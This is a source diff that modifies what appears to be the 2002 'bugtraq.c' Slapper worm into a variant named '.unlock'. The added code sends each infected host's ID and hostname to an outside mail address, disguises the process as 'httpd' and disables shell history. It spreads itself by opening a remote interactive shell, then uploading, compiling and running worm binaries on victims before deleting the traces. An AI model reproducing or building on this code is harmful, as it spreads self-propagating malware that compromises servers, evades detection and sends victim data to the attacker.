--- bugtraq.c.txt Wed Sep 25 19:13:09 2002 +++ .unlock.c Fri Sep 20 15:28:10 2002 @@ -35,6 +35,7 @@ * form. It is not the authors fault if it was used for any purposes * * other than educational. * * * + * some modification done by aion (aion@ukr.net) * ****************************************************************************/ #include @@ -62,12 +63,71 @@ #define BROADCASTS 2 #define LINKS 128 #define CLIENTS 128 -#define PORT 2002 +#define PORT 4156 #define SCANPORT 80 #define SCANTIMEOUT 5 #define MAXPATH 4096 #define ESCANPORT 10100 -#define VERSION 12092002 +#define VERSION 20092002 + +////////////////////////////////////////////////////////////////////////////////////// +// aion // +////////////////////////////////////////////////////////////////////////////////////// +#define MAILSRV "freemail.ukr.net" +#define MAILTO "aion@ukr.net" +#define PSNAME "httpd " +#define WORMSRC "/tmp/.unlock" +#define UUHEAD "begin 655 .unlock\n" + +int writem(int, char *); + +int zhdr(int flag) +{ + int fd; char *gzh="\x1f\x8b\x08"; + char *kgz="\x00\x00\x00"; + if((fd=open(WORMSRC,O_WRONLY))==-1) return -1; + if(flag) write(fd,gzh,3); + else write(fd,kgz,3); + close(fd); +} + +int mailme(char *sip) +{ + char cmdbuf[256], buffer[128]; + int pip; long inet; + struct sockaddr_in sck; + struct hostent *hp; + + if(!(pip=socket(PF_INET, SOCK_STREAM, 0))) return -1; + if((inet=inet_addr(MAILSRV))==-1) + { + if(hp=gethostbyname(MAILSRV)) + memcpy (&inet, hp->h_addr, 4); + else return -1; + } + sck.sin_family = PF_INET; + sck.sin_port = htons (25); + sck.sin_addr.s_addr = inet; + if(connect(pip, (struct sockaddr *) &sck, sizeof (sck))<0) return -1; + + gethostname(buffer,128); + sprintf(cmdbuf,"helo test\r\n"); writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + sprintf(cmdbuf,"mail from: test@microsoft.com\r\n"); writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + sprintf(cmdbuf,"rcpt to: "MAILTO"\r\n"); writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + sprintf(cmdbuf,"data\r\n"); writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + sprintf(cmdbuf," hostid: %d \r\n" + " hostname: %s \r\n" + " att_from: %s \r\n",gethostid(),buffer,sip); + writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + sprintf(cmdbuf,"\r\n.\r\nquit\r\n"); writem(pip, cmdbuf); + recv(pip,cmdbuf,sizeof(cmdbuf),0); + return close(pip); +} ////////////////////////////////////////////////////////////////////////////////////// // Macros // @@ -1136,8 +1196,8 @@ register char *p; char buf[80]; FILE *in; - if ((in=fopen("/tmp/.bugtraq.c","r")) == NULL) return 0; - writem(a,"begin 655 .bugtraq.c\n"); + if ((in=fopen(WORMSRC,"r")) == NULL) return 0; + writem(a,UUHEAD); while ((n = fread(buf, 1, 45, in))) { ch = ENC(n); if (sendch(a,ch) <= ASUCCESS) break; @@ -1346,14 +1406,26 @@ int maxfd, n; alarm(3600); - writem(sockfd,"TERM=xterm; export TERM=xterm; exec bash -i\n"); - writem(sockfd,"rm -rf /tmp/.bugtraq.c;cat > /tmp/.uubugtraq << __eof__;\n"); + conv(localip,256,myip); memset(rcv,0,1024); +// aion + writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;" + "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;" + "exec bash -i\n"); + writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c " + " /tmp/httpd /tmp/update /tmp/.unlock; \n"); + writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n"); + zhdr(1); encode(sockfd); + zhdr(0); writem(sockfd,"__eof__\n"); - conv(localip,256,myip); - memset(rcv,0,1024); - sprintf(rcv,"/usr/bin/uudecode -o /tmp/.bugtraq.c /tmp/.uubugtraq;gcc -o /tmp/.bugtraq /tmp/.bugtraq.c -lcrypto;/tmp/.bugtraq %s;exit;\n",localip); - writem(sockfd,rcv); + writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; " + "tar xzf /tmp/.unlock -C /tmp/; " + "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; " + "gcc -o /tmp/update /tmp/.update.c;\n"); + sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip); + writem(sockfd,rcv); sleep(3); + writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c " + " /tmp/httpd /tmp/update; exit; \n"); for (;;) { FD_ZERO(&rset); FD_SET(sockfd, &rset); @@ -1694,9 +1766,7 @@ ////////////////////////////////////////////////////////////////////////////////////// int main(int argc, char **argv) { -#ifdef SCAN unsigned char a=0,b=0,c=0,d=0; -#endif unsigned long bases,*cpbases; struct initsrv_rec initrec; int null=open("/dev/null",O_RDWR); @@ -1726,18 +1796,16 @@ relay(cpbases[bases-1],(char*)&initrec,sizeof(struct initsrv_rec)); } numlinks=0; - dup2(null,0); - dup2(null,1); - dup2(null,2); + dup2(null,0); dup2(null,1); dup2(null,2); if (fork()) return 1; -#ifdef SCAN - a=classes[rand()%(sizeof classes)]; - b=rand(); - c=0; - d=0; -#endif - signal(SIGCHLD,nas); - signal(SIGHUP,nas); +// aion + mailme(argv[1]); zhdr(0); + for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; + for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; + strcpy(argv[0],PSNAME); + + a=classes[rand()%(sizeof classes)]; b=rand(); c=0; d=0; + signal(SIGCHLD,nas); signal(SIGHUP,nas); while (1) { static unsigned long timeout=0,timeout2=0,timeout3=0; char buf_[3000],*buf=buf_;